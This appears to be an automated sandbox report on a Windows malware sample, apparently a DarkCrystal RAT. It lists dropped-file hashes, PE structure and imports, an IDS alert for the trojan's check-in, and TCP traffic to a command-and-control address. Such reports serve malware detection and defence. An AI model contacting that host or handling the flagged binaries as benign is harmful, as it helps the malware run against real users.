                                                                                      Entropy (8bit):4.918562939644916
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:AjOxR03VNNA5BSq3:AjaKA5j3
                                                                                      MD5:793BD9600A204E94538BCFBB85574546
                                                                                      SHA1:BDF859CA7CF9DC8145A3A205046AD5FF2D871BFB
                                                                                      SHA-256:DC584A17D24C92481253352AA78DB1210C41F82ACB5081E59E491A3E01648F4D
                                                                                      SHA-512:14E0649A6D0EBC89E3AABE2C878357104ADBB310078C1EF60FE90D85C69D264263BBAE9D198CA444A5EF66C77CC54B1B04A930DF8B88AA1E1C6B58059754EEB0
                                                                                      Malicious:false
                                                                                      Preview:D11yIzdIT3kMfNkb2krW7GniOj6yjqzphbydHvweHtSGdwODxf
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5964288
                                                                                      Entropy (8bit):4.53470447886868
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:VV7KXp8CLvW3p4I5iONcX0PHTSV9ZPEeAGz0RBiknbaYiF:V48ce3RE0PWFbAXfikmLF
                                                                                      MD5:23710DF1E01CFC3FA04052BA9F873D98
                                                                                      SHA1:D94A2DA61571F7BB2F8A699CBA385AB043C4B26B
                                                                                      SHA-256:AEC8CA62DEA4BC175B0F8AED5A38FDA3E879657B9D1E8DEA0CDCA274C4D1F3D9
                                                                                      SHA-512:946409D67F3D4A5536FC7BC2267A1CC3A5B22334C92B635236282A9C348CC6321910E1052E8D70CC41B67D07BDA422A6DE01423C82C262061D60B3A3C7FCBF66
                                                                                      Malicious:true
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:ASCII text, with very long lines (558), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):558
                                                                                      Entropy (8bit):5.883085633167816
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Lp1rzBjm5Wa6OEJ9RiopHRTOcThhLiTCfDObT9X2DOkh8Uz2m13c1ZO:LPBCIa+eopxZStBX2Dr8Un1MHO
                                                                                      MD5:158B17F625B2FDF42D681C337A80D47A
                                                                                      SHA1:63633B90E2F0D18F061265A72C04A1B7F12E7641
                                                                                      SHA-256:E15142DC8506F8BFD9612664E8BDD49E6DF6D6DAA2B4A3E9ECA6E97BE3BCD38E
                                                                                      SHA-512:22D40AB75543051C94B04778FD43E8AF63369BB22EE2B5C873A377C4267B919484114321D12C3DDF2782FABCF4AD9915C53EC53DCDA328BAB5BF1EABE4564A9A
                                                                                      Malicious:false
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5964288
                                                                                      Entropy (8bit):4.53470447886868
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:VV7KXp8CLvW3p4I5iONcX0PHTSV9ZPEeAGz0RBiknbaYiF:V48ce3RE0PWFbAXfikmLF
                                                                                      MD5:23710DF1E01CFC3FA04052BA9F873D98
                                                                                      SHA1:D94A2DA61571F7BB2F8A699CBA385AB043C4B26B
                                                                                      SHA-256:AEC8CA62DEA4BC175B0F8AED5A38FDA3E879657B9D1E8DEA0CDCA274C4D1F3D9
                                                                                      SHA-512:946409D67F3D4A5536FC7BC2267A1CC3A5B22334C92B635236282A9C348CC6321910E1052E8D70CC41B67D07BDA422A6DE01423C82C262061D60B3A3C7FCBF66
                                                                                      Malicious:true
                                                                                      Process:C:\Windows\System32\w32tm.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):151
                                                                                      Entropy (8bit):4.7878554493447885
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:VLV993J+miJWEoJ8FX+zGTGWrXKNvomJ8XKvj:Vx993DEUv4GqmuXs
                                                                                      MD5:ACEB69B8F8B7C4A37ADB151CB1E2195C
                                                                                      SHA1:9A924E63CCB9E2DC69FB9FF742D44B945DB495B0
                                                                                      SHA-256:944820E41C15B249FCB5C70B2AB8047003FFA2ED22FAC82727377C20165E4C28
                                                                                      SHA-512:F9203448DEDF9DF489C36592FA755025979FE37C88C10EDB43E261D91B3A23D880C8E6E5CBB89959BA6E89F56DA273FAFE82067CAC3C875987A8D856E193C641
                                                                                      Malicious:false
                                                                                      Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 06/03/2024 11:36:16..11:36:16, error: 0x80072746.11:36:21, error: 0x80072746.
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.953968550759272
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:CJF0Ri1HrG.exe
                                                                                      File size:2'730'343 bytes
                                                                                      MD5:622af327a5c66ca6d6d41bf02384b590
                                                                                      SHA1:2e09d3d9017aec9781b77144323eacb06e7838c4
                                                                                      SHA256:1b41fe8ede3b534d1ce19e0d2976fa735e7e2187d17dcbea6c337ed176ad038a
                                                                                      SHA512:6155abf3c3131a7bfd2a7be9f216ee3e65a3492e8d2de256e98db8569a79cdbab3de710e41fa803aab5f96876a3eaf6ec813bb7320bca36c45d8eded34f1ecb9
                                                                                      SSDEEP:49152:IBJgMDRANx3WB2aXuAoVNcqUhwMH9tM+EvhyJWXovJaDiSNESDgKZR8f:yn0VkZ0yF9tMhGwHuV5KZef
                                                                                      TLSH:D4C52302BFC29272D063197379396B11697D7E202BB6CADB6344662EDD306C0E731BB5
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                                                      Icon Hash:1515d4d4442f2d2d
                                                                                      Entrypoint:0x41f530
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                      Instruction
                                                                                      call 00007FE108CAFECBh
                                                                                      jmp 00007FE108CAF7DDh
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      push esi
                                                                                      push dword ptr [ebp+08h]
                                                                                      mov esi, ecx
                                                                                      call 00007FE108CA2627h
                                                                                      mov dword ptr [esi], 004356D0h
                                                                                      mov eax, esi
                                                                                      pop esi
                                                                                      pop ebp
                                                                                      retn 0004h
                                                                                      and dword ptr [ecx+04h], 00000000h
                                                                                      mov eax, ecx
                                                                                      and dword ptr [ecx+08h], 00000000h
                                                                                      mov dword ptr [ecx+04h], 004356D8h
                                                                                      mov dword ptr [ecx], 004356D0h
                                                                                      ret
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      push esi
                                                                                      mov esi, ecx
                                                                                      lea eax, dword ptr [esi+04h]
                                                                                      mov dword ptr [esi], 004356B8h
                                                                                      push eax
                                                                                      call 00007FE108CB2C6Fh
                                                                                      test byte ptr [ebp+08h], 00000001h
                                                                                      pop ecx
                                                                                      je 00007FE108CAF96Ch
                                                                                      push 0000000Ch
                                                                                      push esi
                                                                                      call 00007FE108CAEF29h
                                                                                      pop ecx
                                                                                      pop ecx
                                                                                      mov eax, esi
                                                                                      pop esi
                                                                                      pop ebp
                                                                                      retn 0004h
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      sub esp, 0Ch
                                                                                      lea ecx, dword ptr [ebp-0Ch]
                                                                                      call 00007FE108CA25A2h
                                                                                      push 0043BEF0h
                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                      push eax
                                                                                      call 00007FE108CB2729h
                                                                                      int3
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      sub esp, 0Ch
                                                                                      lea ecx, dword ptr [ebp-0Ch]
                                                                                      call 00007FE108CAF8E8h
                                                                                      push 0043C0F4h
                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                      push eax
                                                                                      call 00007FE108CB270Ch
                                                                                      int3
                                                                                      jmp 00007FE108CB41A7h
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      push 00422900h
                                                                                      push dword ptr fs:[00000000h]
                                                                                      Programming Language:
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/06/24-09:52:31.999098 | TCP | 2048095 | ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) | 49735 | 80 | 192.168.2.4 | 91.227.16.11
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                      Mar 6, 2024 09:52:34.573467016 CET4973980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:34.914783001 CET804973991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:34.914844990 CET804973991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:34.915594101 CET4973980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:35.257131100 CET804973991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:35.285372972 CET804973991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:35.340121031 CET4973980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:35.410756111 CET4973580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:35.411017895 CET4973980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:35.414216042 CET4974080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:35.752343893 CET804973991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:35.755111933 CET804973591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:35.755228996 CET4973580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:35.755228996 CET4973980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:35.759198904 CET804974091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:35.762025118 CET4974080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:35.762254953 CET4974080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:36.107369900 CET804974091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:36.107430935 CET804974091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:36.107726097 CET4974080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:36.452747107 CET804974091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:36.479062080 CET804974091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:36.527656078 CET4974080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:36.641108990 CET4974280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:36.986656904 CET804974291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:36.987365961 CET4974280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:36.987514019 CET4974280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:37.333170891 CET804974291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:37.333208084 CET804974291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:37.333544016 CET4974280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:37.679131985 CET804974291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:37.707859993 CET804974291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:37.761924982 CET4974280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:37.840925932 CET4974280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:37.842545986 CET4974380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:38.186317921 CET804974291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:38.186397076 CET4974280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:38.187306881 CET804974391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:38.187393904 CET4974380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:38.187553883 CET4974380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:38.532370090 CET804974391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:38.532499075 CET804974391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:38.532763958 CET4974380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:38.877758980 CET804974391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:38.906996012 CET804974391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:38.949531078 CET4974380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.053997040 CET4974380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.054963112 CET4974580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.341914892 CET4974680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.398081064 CET804974591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:39.398293018 CET4974580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.398377895 CET4974580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.399070024 CET804974391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:39.399133921 CET4974380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.476191044 CET4974580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.685046911 CET804974691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:39.685147047 CET4974680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.685349941 CET4974680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.741528988 CET804974591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:39.741556883 CET804974591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:39.741756916 CET4974580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.819690943 CET804974591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:39.819756985 CET4974580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:39.910233974 CET4974080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:40.028417110 CET804974691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:40.028506994 CET804974691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:40.074410915 CET4974680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:40.087990999 CET4974680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:40.091943026 CET4974780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:40.431441069 CET804974691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:40.432478905 CET804974791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:40.432632923 CET4974780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:40.437248945 CET4974780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:40.459626913 CET804974691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:40.511898041 CET4974680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:40.779277086 CET804974791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:40.779300928 CET804974791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:40.779640913 CET4974780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:41.121202946 CET804974791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:41.148926020 CET804974791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:41.199402094 CET4974780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:43.915899992 CET4974680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:43.919186115 CET4974780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:43.919591904 CET4974980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:44.259747028 CET804974791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:44.259887934 CET4974780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:44.260214090 CET804974691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:44.260265112 CET4974680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:44.264698982 CET804974991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:44.264780045 CET4974980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:44.264975071 CET4974980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:44.610251904 CET804974991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:44.610304117 CET804974991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:44.610636950 CET4974980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:44.956151962 CET804974991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:44.985385895 CET804974991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:44.986268044 CET4974980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.119117022 CET4975080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.332684040 CET804974991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:45.332843065 CET4974980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.460798979 CET804975091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:45.460921049 CET4975080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.461106062 CET4975080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.468244076 CET4975080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.468522072 CET4975180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.605514050 CET4975280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.802844048 CET804975091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:45.802882910 CET804975091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:45.802953005 CET4975080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.809537888 CET804975091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:45.809607029 CET4975080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.811521053 CET804975191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:45.811614037 CET4975180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.811775923 CET4975180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.946378946 CET804975291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:45.946496010 CET4975280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:45.946743965 CET4975280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:46.155179977 CET804975191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:46.155237913 CET804975191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:46.155657053 CET4975180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:46.287306070 CET804975291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:46.287347078 CET804975291.227.16.11192.168.2.4
